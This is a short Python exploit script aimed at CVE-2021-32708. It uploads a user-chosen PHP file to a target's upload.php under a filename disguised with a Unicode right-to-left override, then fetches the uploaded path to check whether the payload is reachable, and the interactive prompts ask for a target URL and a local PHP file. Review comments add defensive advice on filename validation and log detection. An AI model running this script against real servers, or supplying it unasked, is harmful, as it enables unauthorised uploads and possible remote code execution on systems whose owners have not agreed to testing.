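import requests

# Seconds to wait on each HTTP request; without a timeout, requests can block
# indefinitely on an unresponsive server.
REQUEST_TIMEOUT = 10


def exploit_cve_2021_32708(target_url, local_file):
    """Upload *local_file* under a crafted filename and probe whether it is served back.

    Posts the file to ``{target_url}/upload.php`` as multipart field ``file``,
    then requests ``{target_url}/uploads/<filename>`` and prints the outcome.

    Args:
        target_url: Base URL of the application under test. It is joined with
            "/upload.php" by plain string formatting, so pass it without a
            trailing slash (as in the prompt's example).
        local_file: Path of the local file to send; opened in binary mode.

    Returns:
        None. Results are reported on stdout.

    Raises:
        OSError: If *local_file* cannot be opened. The open happens outside the
            request error handling, so this propagates to the caller.
    """
    # NOTE(review): U+202E is RIGHT-TO-LEFT OVERRIDE, a bidirectional
    # formatting control, not a whitespace character. It changes how the name
    # is rendered; the name as sent still ends in ".txt".
    # Defensive takeaway: an upload handler should reject or strip control and
    # format characters (Unicode categories Cc/Cf) before checking the
    # extension, validate the final normalised name rather than the raw one,
    # and prefer server-generated storage names. Such characters in a
    # multipart filename are also a useful detection signal in request logs.
    malicious_filename = "exploit\u202Ephp.txt"
    upload_endpoint = f"{target_url}/upload.php"

    # The context manager closes the handle on every path; the original left
    # the file open for the lifetime of the process.
    with open(local_file, 'rb') as payload:
        files = {'file': (malicious_filename, payload)}
        try:
            response = requests.post(
                upload_endpoint, files=files, timeout=REQUEST_TIMEOUT
            )
            if response.status_code != 200:
                print("[-] Failed to upload the file.")
                return

            print("[+] File uploaded successfully.")

            # Check if the uploaded file is accessible.
            # NOTE(review): a 200 here only shows that the URL returned a
            # response; it does not by itself show that the server interpreted
            # the file. Confirm against server-side logs before reporting.
            exploit_url = f"{target_url}/uploads/{malicious_filename}"
            check_response = requests.get(exploit_url, timeout=REQUEST_TIMEOUT)
            if check_response.status_code == 200:
                print(f"[!] Exploit triggered! Access your payload at: {exploit_url}")
            else:
                print("[-] File upload successful but payload is not accessible.")
        except Exception as e:
            # Top-level boundary of a CLI script: report the failure and
            # return, as the original did. Kept broad on purpose because
            # printing a name containing U+202E can itself raise an encoding
            # error on some consoles.
            print(f"[!] Error: {e}")


if __name__ == "__main__":
    url = input("Enter the target URL (e.g., http://example.com): ")
    file_path = input("Enter the path to the local PHP file: ")
    exploit_cve_2021_32708(url, file_path)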